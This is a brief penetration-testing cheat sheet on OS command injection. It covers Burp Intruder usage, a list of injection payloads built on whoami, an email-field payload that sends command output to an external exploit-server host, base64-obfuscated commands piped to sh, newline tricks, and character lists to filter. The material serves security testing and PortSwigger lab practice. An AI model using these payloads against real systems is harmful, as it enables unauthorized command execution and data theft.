In command injection testing, the tester tries to inject an OS command into the application through an HTTP request. An OS command injection vulnerability follows the pattern below: user input flows unmodified into an OS command.
Input -> OS Command == OS Command Injection
Testing
- Send the request to the Intruder module in Burp Suite.
- Use this list (SecLists on GitHub) as the payload list.
Common payloads (%0A is the URL-encoded newline character):
%0Awhoami
; whoami
& whoami
`whoami`
&& whoami
$(whoami)
| whoami
|| whoami
Examples
In email address input
Use the exploit server from the PortSwigger labs 😉 You can use this lab.
$(whoami)@<EXPLOIT SERVER ID>.exploit-server.net
Examples when some characters are not allowed
Execute "ls -l /" (the base64 string below decodes to `ls -l /`)
base64 -d <<< bHMgLWwgLwo= | sh
$(base64 -d <<< bHMgLWwgLwo=)
Add a new line
$(<%0a127.0.0.1) # %0a: new line
$(<%0d127.0.0.1) # %0d: carriage return
Examples "ping"
command=ping -c 5 IP
IP = 127.0.0.1%0awhoami
command=ping -c 5 127.0.0.1%0awhoami
Special characters to escape or filter (general list):
{ } ( ) > < * | = ? ; [ ] $ # ~ ! . % / \ : , `
Escape or filter special characters for Windows
( ) < > & * ' | = ? ; [ ] ^ ~ ! . " % @ / \ : + , `
Escape or filter special characters for Linux
{ } ( ) > < & * ' | = ? ; [ ] $ - # ~ ! . " % / \ : + , `